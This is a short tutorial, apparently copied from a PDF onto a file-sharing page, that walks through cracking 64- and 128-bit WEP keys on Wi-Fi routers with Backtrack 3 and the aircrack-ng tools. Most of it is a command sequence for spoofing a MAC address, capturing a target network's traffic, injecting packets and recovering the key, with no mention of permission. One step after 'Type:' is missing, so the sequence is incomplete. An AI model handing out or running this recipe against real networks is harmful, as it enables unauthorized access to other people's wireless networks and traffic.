Cracking WEP Using Backtrack 3.pdf

This article will explan how to crack 64bit and 128bit WEP on many WIFI access points and routers

using Backtrack, a live linux distribution. Your mileage may very. The basic theory is that we want to

connect to an Access Point using WEP Encryption, but we do not know the key. We will attack the

wifi router, making it generate packets for our cracking effort, finally cracking the WEP key. I have

tested this technique on an IBM Thinkpad x60 and Acer 5672 and the WIFI Chipset in those machines

work for sure.

Requirements:

Backtrack 3 on CD or USB

Computer with compatible 802.11 wireless card

Wireless Access point or WIFI Router using WEP encryption

I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part

out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and

do the following:

Preparing The WIFI Card

First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG

chipset issue the following commands:

modprobe -r iwl3945

modprobe ipwraw

The above commands will enable monitor mode on the wireless chipset in your computer. Next we

must stop your WIFI card:

iwconfig

Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng stop [device]

Then:

ifconfig down [interface]

Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]

Its now time to start the card in monitor mode by doing:

airmon-ng start [device]

Attacking The Target

It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now

we must start collecting data from the WIFI access point for the attack:

airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]

The above command will output data collected to the file: network.out. This file will be fed into the

WEP Crack program when we are ready to crack the WEP key.

Open another shell and leave the previous command running. Now we need to generate some fake

packets to the access point to speed up the data output. Test the access point by issuing the

following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

If this command is successful we will now generate many packets on the target network so that we

can crack the KEY. Type:

This will force the access point to send out a bunch of packets which we can then use to crack the

WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with

packets.

After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the

target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

Once you have enough packets, you begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N

to 64.

Once the crack is successful you will be left with the KEY! Remove the : from the output and there is

your key. So there you have it.

Plik z chomika:

Inne pliki z tego folderu:

Inne foldery tego chomika: